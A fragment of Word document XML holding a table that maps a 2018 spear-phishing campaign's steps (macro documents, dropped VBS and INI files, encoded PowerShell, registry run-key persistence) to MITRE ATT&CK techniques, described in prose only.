                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3822411C" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">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430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1528B41A" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5592169F" w14:textId="376E2A37" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="607AAF0C" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D9A3EAB" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="016301C3" w14:textId="44254ABB" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E474EEF" w14:textId="0A276B5A" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A0702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="006451C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The spear phishing emails and attached malicious macro documents typically have geopolitical themes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w14:paraId="2A625954" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03FDFBBD" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41AF3D9A" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ADB22C5" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D1DA00" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A50458" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A495B6" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A10369E" w14:textId="65B0C5E4" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0C1A86" w14:textId="7B346D6C" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00765632">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8482C" w:rsidRPr="00B857D7" w14:paraId="0BF7CFAC" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="135FFBC1" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6449E750" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C"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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023BDDDB" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049125D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>T1207 Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DBABC5A" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD89F78" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="046A6FC0" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024DD239" w14:textId="4EB3C3B8" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E869465" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002308C8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00765632">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The INI file contains the Base64 encoded PowerShell command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> ….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8482C" w:rsidRPr="00B857D7" w14:paraId="1E8A370A" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE14755" w14:textId="6C13FC33" w:rsidR="00B8482C" w:rsidRDefault="00E40D7B" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="067A586E" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C"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2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E9F318E" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C3CD3E6" w14:textId="36EF78B0" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00BC4827" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249A0B0E" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44A6CC29" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF323F3" w14:textId="65BC1C43" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B9E93C" w14:textId="77777777" w:rsidR="00B8482C" w:rsidRPr="00B8482C" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8482C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Assuming a similar approach to second approach</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B70011" w14:textId="6917663C" w:rsidR="00B8482C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8482C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008135A8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>After dropping the three files, the macro will set the following registry key to achieve persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF3672" w:rsidRPr="00B857D7" w14:paraId="10EEDCC0" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="709932FB" w14:textId="21C8F2C0" w:rsidR="00FF3672" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4045B03C" w14:textId="577837CB" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C86BABF" w14:textId="1529F2D8" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B72021" w14:textId="135279CD" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77587DA8" w14:textId="77777777" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18D996E9" w14:textId="2D85D5EF" w:rsidR="00FF3672" w:rsidRDefault="000F2CD9" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7F2C4D" w14:textId="00BD33AD" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD38700" w14:textId="6E21BB9D" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00514FB1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] …. </w:t>
            </w:r>
            <w:r w:rsidR="00B8482C" w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00E40D7B" w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidR="00B8482C" w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>rom</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00B8482C" w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3) </w:t>
            </w:r>
            <w:r w:rsidRPr="00B80DF1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C25C73" w:rsidRPr="00B857D7" w14:paraId="0B6AE77E" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA62AA5" w14:textId="448CDDD1" w:rsidR="00C25C73" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BEB21E" w14:textId="3A4BFA10" w:rsidR="00C25C73" w:rsidRPr="00B857D7" w:rsidRDefault="00C25C73" w:rsidP="002B57F6">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w:t>
            </w:r>
            <w:r w:rsidR="009D6782">
